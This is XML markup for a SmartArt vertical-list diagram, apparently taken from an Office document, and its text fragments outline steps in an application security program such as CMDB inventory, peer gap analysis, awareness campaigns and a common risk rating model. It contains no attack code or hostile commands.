    <dgm:cxn modelId="{F1935DBB-203C-4FC1-88EA-2575E8CB033D}" type="presOf" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{54EF7BE7-39C1-4467-9998-E375D36E46A6}" type="presOf" srcId="{B2318C33-0848-4267-9C94-016EE7B20800}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EE369573-7275-4190-A508-8493472AD3CB}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D7D751B1-9789-48D6-A3D2-88F4CB3AE9C9}" srcOrd="2" destOrd="0" parTransId="{36639052-9A6E-47C7-A020-F81AA12F1A3C}" sibTransId="{1887D76E-BF0A-4F02-9071-53896CF7538A}"/>
    <dgm:cxn modelId="{8F923414-B3DF-49C1-A49C-0C007DE34406}" type="presOf" srcId="{247D57F2-8E57-4FE8-BC5D-1538DE9C7ED2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{9FCAC402-6721-43DD-BDB5-30970CCF9503}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{495252AF-5996-4B38-A1EE-B648650A10A0}" srcOrd="3" destOrd="0" parTransId="{5602DF29-E513-4B50-B37A-05F44A5B2860}" sibTransId="{F126DBDA-495B-4894-915F-3153C0E98C12}"/>
    <dgm:cxn modelId="{5E234C0A-A90A-47CD-B6CB-2C8644F72A41}" type="presOf" srcId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BA01AABB-2CAA-4B1B-A803-7CB9396FC548}" type="presOf" srcId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6E1CCD24-6D67-4E10-B599-09D2B01DD12D}" type="presOf" srcId="{6280EA87-E46C-40B8-91EF-12C1C27B37A0}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E6B76C72-38DB-43AF-8455-DB3A5CF8A05B}" type="presOf" srcId="{719FD505-9C05-4301-8C8D-24A4329404ED}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BA0ADC37-98BA-40CA-8D2C-6CD43ABA42B1}" type="presOf" srcId="{080DE4A9-31B3-4529-9CA3-FC30B3D31A77}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="5"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1735E49E-A72F-4CE8-ACF4-8D8E2AFBD1C8}" type="presOf" srcId="{B37AA48A-B472-430E-BA2D-A5987A2A00B1}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{55153752-3F77-4EF2-AC43-BFB0A8258E33}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B37AA48A-B472-430E-BA2D-A5987A2A00B1}" srcOrd="1" destOrd="0" parTransId="{616351A7-0195-4CE7-B5DB-5E2C1EEF2FF1}" sibTransId="{64A73F2A-13B4-4E68-9636-D09B88E2C56B}"/>
    <dgm:cxn modelId="{63135E9D-0166-4C62-A25F-07AA6CA5DAEE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}" srcOrd="2" destOrd="0" parTransId="{CAD62425-A044-493A-9ACD-CCC204D1EF4F}" sibTransId="{83F80472-48C4-49F9-B224-5AD7D393F679}"/>
    <dgm:cxn modelId="{CFC5E301-BDE4-4D4C-B6FC-1C26EB94D275}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" srcOrd="2" destOrd="0" parTransId="{73A5B6BE-984C-43D5-83D1-70267B05EA9B}" sibTransId="{514DE64B-2054-4928-808C-6A92FFA3AA8E}"/>
    <dgm:cxn modelId="{CA89D5E2-4F16-469C-B632-9D51D68247F1}" type="presOf" srcId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E68C0E87-1EFC-48C6-9C85-EC01F558483C}" type="presOf" srcId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{802204A9-1D21-4865-A6B6-BBB5D2AF6ACB}" type="presOf" srcId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{CD54592C-0C23-4D96-AEE5-0D8408135E75}" type="presOf" srcId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B98CA423-6056-48A5-8715-E2F822D9E61B}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{CA8034F6-E027-4D76-A5F9-70FE299619D0}" srcOrd="4" destOrd="0" parTransId="{F121DD58-051E-4186-B611-30AF12D23895}" sibTransId="{816CF6D5-3121-49C6-98A5-77CE40307EFF}"/>
    <dgm:cxn modelId="{F1F361EE-EF57-4CB3-9465-965D5F97E292}" type="presOf" srcId="{7FF32AF6-DBCC-4EB2-B43B-A00188F7D204}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0"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AB692422-CD23-450F-BCA7-D4B257000601}" type="presOf" srcId="{495252AF-5996-4B38-A1EE-B648650A10A0}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ECBD12BB-2B0F-4D84-990D-D7EBC2A4B374}" type="presOf" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0"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6C048991-4CC6-48F3-85DE-06094639B4B0}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" srcOrd="2" destOrd="0" parTransId="{6430CCC0-80BE-422D-A3E8-13258D4D7A5E}" sibTransId="{572A770A-F271-4A43-9C1A-29DB0F45AD29}"/>
    <dgm:cxn modelId="{D5DDFAE3-A960-49DD-8226-51E6C43EA63F}" type="presOf" srcId="{38353036-4B60-4F8B-ACD2-5B049C807A9A}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{49821016-59B2-49A9-8B65-5A27F6D118C2}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" srcOrd="3" destOrd="0" parTransId="{C494CE06-D836-41D9-ADFD-898F15E5786C}" sibTransId="{5A8D486C-9838-4EFE-BEDB-F072BF324AD0}"/>
    <dgm:cxn modelId="{99183B3E-7A16-41C7-9777-2D46365F24B3}" type="presOf" srcId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A4BCFA15-B570-475E-8076-E0DF9219BD56}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" srcOrd="4" destOrd="0" parTransId="{F7BEB89D-4E4B-4D2E-BAF8-791B6EF09E28}" sibTransId="{3AEE799B-7F35-4AE2-93E2-335733E35922}"/>
    <dgm:cxn modelId="{2B332EAB-1224-4EC7-902F-FB64603358D2}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" srcOrd="3" destOrd="0" parTransId="{DA9F1A23-7ABB-43F5-841D-3D2FC9925CFB}" sibTransId="{E2D6A2A1-5438-4DC5-806B-70724658813A}"/>
    <dgm:cxn modelId="{26F040A1-C5E7-457A-A27B-40B0E6D3B559}" type="presOf" srcId="{60779E52-CC5F-4109-9E02-C8F73324C37D}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4C4CA354-5C15-4BFD-B9D5-27DE12BF1DF8}" type="presOf" srcId="{6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="1"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7A90871C-BF2A-4DA1-B67A-F38BED85FC4C}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{6CD4BB62-D241-46BC-9B32-86E2CC12748D}" srcOrd="2" destOrd="0" parTransId="{D2D2A06B-5339-4194-90B5-CCE406438AF1}" sibTransId="{F48BCD57-6AB8-45C6-AF3F-815020533A4D}"/>
    <dgm:cxn modelId="{3BD8526A-E933-45C6-995F-85A1173CA5FE}" type="presOf" srcId="{FB9F0EAE-C91F-4A65-B43A-46392ED38733}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D65047F2-7ED0-4B12-AB6C-8717B38C49DE}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{436ACC70-9A3F-496B-A85D-CF77D7FC7207}" srcOrd="3" destOrd="0" parTransId="{97196C37-2225-4EC0-AD9D-ED9EDDE36B2E}" sibTransId="{5B6FED2A-CCAD-4150-BE86-460500775F70}"/>
    <dgm:cxn modelId="{55D72AD2-0211-40BC-A0F3-C386D305CB1F}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" srcOrd="2" destOrd="0" parTransId="{3E44837D-D7DC-4906-821E-A6950790F46F}" sibTransId="{35F82638-1CE8-4F68-915D-3475E1D94C1A}"/>
    <dgm:cxn modelId="{953325A0-207E-4AE6-A6DC-14B69025B19F}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{11A0A642-C8B7-49E9-BDCC-9D9E9714D53F}" srcOrd="1" destOrd="0" parTransId="{21595102-299C-4FC9-AD15-9036120CA438}" sibTransId="{37C87C90-2FAD-4537-98E9-F3A95D63179A}"/>
    <dgm:cxn modelId="{13F66B5D-9AD9-4BDB-9F02-7656055726AD}" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{6C1A3AA0-0A77-4751-A48E-1C557AA7A1B1}" srcOrd="1" destOrd="0" parTransId="{DD0DFC2E-077D-41E3-B0A4-63604CB265D1}" sibTransId="{57282919-BDB2-463E-A675-FC48E99ACDA5}"/>
    <dgm:cxn modelId="{C4D871FF-3725-4AC9-BF02-1A834A53D00C}" type="presOf" srcId="{44A92D55-6CBA-4BF4-9EEA-1B328C3591FE}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{80FEC6FA-CF5A-4C70-ABE9-C754241DFFFA}" type="presOf" srcId="{657D5226-6628-4A3D-87F9-833B7666A7A2}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7627A245-157C-412A-9F89-8049BEB4CB25}" type="presOf" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{3E1D17AE-0190-41E5-B5B9-9EDD1602781C}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6BD5EC9B-B492-4021-91C3-69CFD6D09A24}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{2AE97330-074B-4EBD-B20E-409131B4C40C}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B9654840-CCA9-475F-8026-A0CB36AC23A9}" srcOrd="4" destOrd="0" parTransId="{3E0B7461-5330-4740-AF6F-42E7B3BEFEFB}" sibTransId="{1D675F40-F864-4B2E-B6E2-C9D29AFA9020}"/>
    <dgm:cxn modelId="{97452B92-22D7-4E80-B74D-5D72DE542765}" srcId="{EB2D4C8D-BDCD-4268-8B6F-897D3166DC3E}" destId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" srcOrd="3" destOrd="0" parTransId="{A04D13C9-D9C5-4F60-B4F0-1B363451BF66}" sibTransId="{56B4B5BC-D671-4D10-91B2-18BB09341248}"/>
    <dgm:cxn modelId="{34810BA8-ABE6-4135-9DA7-66092273C67F}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{30CC5E9B-364B-4C35-AF62-6BEDBFA0E938}" srcOrd="2" destOrd="0" parTransId="{918768C3-D12F-4161-B487-A57F29898241}" sibTransId="{2411AEFD-A010-4099-9F18-B1617D3A6C02}"/>
    <dgm:cxn modelId="{9E036B5D-957E-4606-80BB-DDE7F99165C8}" type="presOf" srcId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{B44D63F2-AB6B-4983-9DF8-F210D0EA45C5}" type="presOf" srcId="{841B1886-5BCE-4D3F-B4F3-5072C0E519F2}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0C7F8461-20A4-46AC-8315-1730CCAD234D}" type="presOf" srcId="{89289800-6B11-4BC6-BAD7-66615BE75572}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87F4EBD6-87BE-4A25-9779-492F73D7B271}" type="presOf" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" srcOrd="0" destOrd="0"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0B67B498-F3AE-46E5-BF54-4DC4543B91EA}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}" srcOrd="0" destOrd="0" parTransId="{F5C6F9E8-15EA-4DB6-A217-AAF35BF62BA9}" sibTransId="{B795B6C3-2D36-4EF0-A50C-AE561665029F}"/>
    <dgm:cxn modelId="{8759A102-6DD6-447D-AC76-DA13C8FF9544}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" srcOrd="1" destOrd="0" parTransId="{69CA534A-D7C1-40A6-A52D-08C1C25C2AF2}" sibTransId="{D22B1E2D-9241-472F-8A9E-565E70887137}"/>
    <dgm:cxn modelId="{62404027-5448-4393-9E79-DA90FB84286A}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{7973B29C-5A9A-4A2C-B276-581656BFB1EE}" srcOrd="4" destOrd="0" parTransId="{F5BE4E3D-749F-4DF5-916A-F051FA94842E}" sibTransId="{03388AB2-B7BD-4A7D-8228-58066747E14F}"/>
    <dgm:cxn modelId="{4DA88187-BABF-443E-9058-C65C439DA0BB}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{B2318C33-0848-4267-9C94-016EE7B20800}" srcOrd="1" destOrd="0" parTransId="{7683A137-9B57-417F-A050-9273448B2B4C}" sibTransId="{7BF13A04-DC8A-4830-AC5F-B50FA511F23C}"/>
    <dgm:cxn modelId="{DE5646CC-F144-493B-9414-C6346E590FF4}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{719FD505-9C05-4301-8C8D-24A4329404ED}" srcOrd="1" destOrd="0" parTransId="{423C079E-E5CB-4C54-9E97-54ADA0F45BF5}" sibTransId="{595F5683-5B41-4144-8717-8475FEB51759}"/>
    <dgm:cxn modelId="{0A0A3210-929D-4E7A-8E4B-AB68D9F81EF8}" type="presOf" srcId="{B0103A81-76F6-40DD-8B7E-FAE3E5F88028}" destId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}"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EA4F7058-4CC0-4B4B-A433-9E2269190A1D}" type="presOf" srcId="{64E29A9E-D7A3-4691-83A1-965007B0BD76}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8255EB5E-96BA-4033-B0F3-2209D16DC116}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" srcOrd="3" destOrd="0" parTransId="{DB269FA1-9301-43AF-AA70-A9D7CC0462DC}" sibTransId="{A1D63F8A-2B07-42DD-981B-5171E6B8B8C1}"/>
    <dgm:cxn modelId="{DCD9FF7A-C041-457B-8A4D-32904C98C1F4}" srcId="{E8F64231-9604-4DA4-A0DB-AC6DA1428615}" destId="{C8A13AC1-43D9-4BE9-9345-EBD28ED64723}" srcOrd="6" destOrd="0" parTransId="{E70C6DAC-1356-44C0-BCA2-24EFFF5743FE}" sibTransId="{585354FF-8734-42ED-AE1D-8349C73E2B59}"/>
    <dgm:cxn modelId="{E6B7B6F4-F827-483D-B463-427183ED5830}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BF44EDF3-4505-446C-8D9E-8964E7CA3E7A}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{DF18E836-ADCC-4ADD-BF77-2F15A3EAB282}" type="presParOf" srcId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{0EC64AF3-E2C7-4AF7-A1FC-3BFCD87966AC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8127C106-8A06-4009-B136-777ACDDDD57F}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{D777A049-87AD-4EE5-932B-9078778B4323}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{48AAB212-71DA-4491-9654-7415FB51C308}" type="presParOf" srcId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" destId="{29555282-7DBF-4954-82C2-561252AD070F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{11E452D5-8F7F-4C35-83BC-53F0647C259B}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{8D1C1677-B6A3-41BD-9172-D7CF8A1CC0D9}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{286C205C-7705-4A53-8C18-C8E7EF199705}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{7C34ED21-6657-4A94-915C-12E37FC966FA}" type="presParOf" srcId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{20FC20BF-FD5E-41EF-9EB5-070EF18875CC}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{E59F9A95-200F-42A4-BD23-884EE79FBB88}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{4360DE27-BDD4-4BBE-93EC-11D8ECCF5C29}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{783EC65E-F846-4D6E-AC1D-6DA867F34708}" type="presParOf" srcId="{6FA43676-E617-4D34-8266-D87F1E87C4E7}" destId="{992D08B6-B207-435B-A893-D17B49418ACB}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{AE4AC549-CAAD-4CE5-8AC0-84E4DB749C42}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{7F2930EF-2282-4737-B8ED-0133EE5AB8BC}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A792A45E-08FC-462A-90A0-F280BB083ED6}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{EC92A7D6-82B5-4445-9F96-1081A436E749}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1B32806D-7EE2-477D-8412-3E65680AE962}" type="presParOf" srcId="{315F4F93-7956-455E-AB3A-4CD75398CDEE}" destId="{0BBDD660-3A49-4256-9C52-69675972DDC1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{A7A8A066-134F-4C05-8645-4C7F4068D3B4}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{78713489-5D47-416E-ADAE-302406F812AE}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{5E047A18-0E51-46AB-B90F-F7B0C73F34A7}" type="presParOf" srcId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" destId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{87A1B6BB-3522-4456-9BEB-329CF9E0DF14}" type="presParOf" srcId="{E79E6DD2-6894-4112-AB66-CD4805875FED}" destId="{50CC931A-2802-4A28-B17D-4CFEC4144601}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{1174C7B4-11E6-4B18-BD13-70FD237624A3}"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93075" y="-2191458"/>
          <a:ext cx="980124"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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200">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a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" b="0" kern="1200" noProof="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>in a Configuration Management Database (CMDB).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="120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security program</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> and drive adoption. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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capability gap analysis comparing your organization to your peers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application security awareness campaign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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2003361" y="146102"/>
        <a:ext cx="5511706" cy="884432"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1094177" y="2678"/>
          <a:ext cx="909184"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Get Started</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138560" y="47061"/>
        <a:ext cx="820418" cy="1082511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4334773" y="-961617"/>
          <a:ext cx="95614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protection needs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portfolio</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common risk rating model</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endParaRPr lang="en-US" sz="95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2033071" y="1386760"/>
        <a:ext cx="5512877" cy="862796"/>
      </dsp:txXfrm>
    </dsp:sp>
